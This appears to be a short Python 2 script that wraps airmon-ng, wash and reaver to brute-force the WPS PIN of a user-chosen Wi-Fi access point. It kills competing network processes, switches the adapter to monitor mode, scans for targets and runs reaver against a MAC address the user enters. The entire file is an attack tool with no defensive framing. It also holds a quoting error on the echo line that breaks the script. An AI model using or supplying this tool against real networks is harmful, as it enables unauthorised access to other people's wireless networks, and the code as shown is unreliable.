#!/usr/bin/python
import os
import socket

os.system("clear")
os.system("airmon-ng check kill")
os.system("iwconfig")
WLANinput=raw_input("\nEnter your adapter name:")
os.system("airmon-ng start " + WLANinput)
os.system("wash -i " + WLANinput+"mon0")
os.system("echo "Control+C when your done looking")
MACinput=raw_input("\nEnter MAC Address for Accesspoint:")
os.system("reaver -i " + WLANinput +"mon0"+ " -b " + MACinput + " -d 30 -S -N -vv")
